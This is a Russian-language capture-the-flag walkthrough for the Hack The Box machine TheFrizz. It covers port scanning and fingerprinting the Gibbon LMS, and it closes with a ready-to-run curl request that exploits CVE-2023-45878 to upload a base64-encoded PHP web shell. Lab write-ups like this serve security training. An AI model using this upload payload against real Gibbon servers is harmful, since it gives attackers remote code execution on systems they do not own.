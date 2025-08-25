Се­год­ня я покажу, как экс­плу­ати­ровать нес­ложную веб‑уяз­вимость в сис­теме уда­лен­ного обу­чения Gibbon, работа­ющей на Windows. Получив воз­можность уда­лен­ного выпол­нения кода в сис­теме, мы извле­чем из базы дан­ных учет­ки поль­зовате­лей и пол­ностью зах­ватим сер­вер.

На­ша конеч­ная цель — получе­ние прав супер­поль­зовате­ля на машине TheFrizz с учеб­ной пло­щад­ки Hack The Box. Уро­вень слож­ности задания — сред­ний.

warning

Под­клю­чать­ся к машинам с HTB рекомен­дует­ся с при­мене­нием средств ано­ними­зации и вир­туали­зации. Не делай это­го с компь­юте­ров, где есть важ­ные для тебя дан­ные, так как ты ока­жешь­ся в общей сети с дру­гими учас­тни­ками.

 

Разведка

 

Сканирование портов

До­бав­ляем IP-адрес машины в /etc/hosts:

10.10.11.60 thefrizz.htb

И запус­каем ска­ниро­вание пор­тов.

Справка: сканирование портов

Ска­ниро­вание пор­тов — стан­дар­тный пер­вый шаг при любой ата­ке. Он поз­воля­ет ата­кующе­му узнать, какие служ­бы на хос­те при­нима­ют соеди­нение. На осно­ве этой информа­ции выбира­ется сле­дующий шаг к получе­нию точ­ки вхо­да.

На­ибо­лее извес­тный инс­тру­мент для ска­ниро­вания — это Nmap. Улуч­шить резуль­таты его работы ты можешь при помощи сле­дующе­го скрип­та:

#!/bin/bash
ports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '
' ',' | sed s/,$//)
nmap -p$ports -A $1

Он дей­ству­ет в два эта­па. На пер­вом про­изво­дит­ся обыч­ное быс­трое ска­ниро­вание, на вто­ром — более тща­тель­ное ска­ниро­вание, с исполь­зовани­ем име­ющих­ся скрип­тов (опция -A).

Результат работы скрипта
Ре­зуль­тат работы скрип­та

Ска­нер нашел 13 откры­тых пор­тов:

  • 22 — OpenSSH;
  • 80 (HTTP) — веб‑сер­вер Apache 2.4.58;
  • 88 — Kerberos;
  • 135 — служ­ба уда­лен­ного вызова про­цедур (Microsoft RPC);
  • 139 — служ­ба сеан­сов NetBIOS, NetLogon;
  • 389 — LDAP;
  • 445 — SMB;
  • 464 — служ­ба сме­ны пароля Kerberos;
  • 593 (HTTP-RPC-EPMAP) — исполь­зует­ся в служ­бах DCOM и MS Exchange;
  • 636 — LDAP с шиф­ровани­ем SSL или TLS;
  • 3268 (LDAP) — для дос­тупа к Global Catalog от кли­ента к кон­трол­леру;
  • 3269 (LDAPS) — для дос­тупа к Global Catalog от кли­ента к кон­трол­леру через защищен­ное соеди­нение;
  • 9389 — веб‑служ­бы AD DS.

Веб‑сер­вер выпол­няет редирект на frizzdc.frizz.htb. Обновля­ем запись в фай­ле /etc/hosts и откры­ваем сайт через бра­узер.

10.10.11.60 thefrizz.htb frizzdc.frizz.htb frizz.htb
Главная страница сайта
Глав­ная стра­ница сай­та
 

Точка входа

На стра­нице Welcome находим уве­дом­ление, в котором ска­зано о перехо­де на про­токо­лы аутен­тифика­ции Azure Active Directory и Kerberos.

Содержимое страницы Welcome
Со­дер­жимое стра­ницы Welcome

Вни­зу стра­ницы находим наз­вание и вер­сию движ­ка сай­та — Gibbon v25.0.00. Пер­вым делом сто­ит про­верить, есть ли для нее уяз­вимос­ти. Про­ще все­го — поис­кать в Google.

Поиск эксплоитов в Google
По­иск экс­пло­итов в Google

Из резуль­татов узна­ем, что Gibbon до вер­сии v25.0.01 уяз­вим к CVE-2023-45878. Суть уяз­вимос­ти зак­люча­ется в том, что неав­торизо­ван­ный поль­зователь может заг­ружать про­изволь­ные фай­лы на сер­вер, а это поз­воля­ет получить уда­лен­ное выпол­нение кода через заг­рузку PHP-шел­ла. Сле­дующим зап­росом заг­рузим PHP-шелл asdf.php в каталог Gibbon.

curl -X POST 'http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php' -H 'Host: frizzdc.frizz.htb' --data-urlencode "img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKT8+" -d 'path=asdf.php' -d 'gibbonPersonID=0000000001'

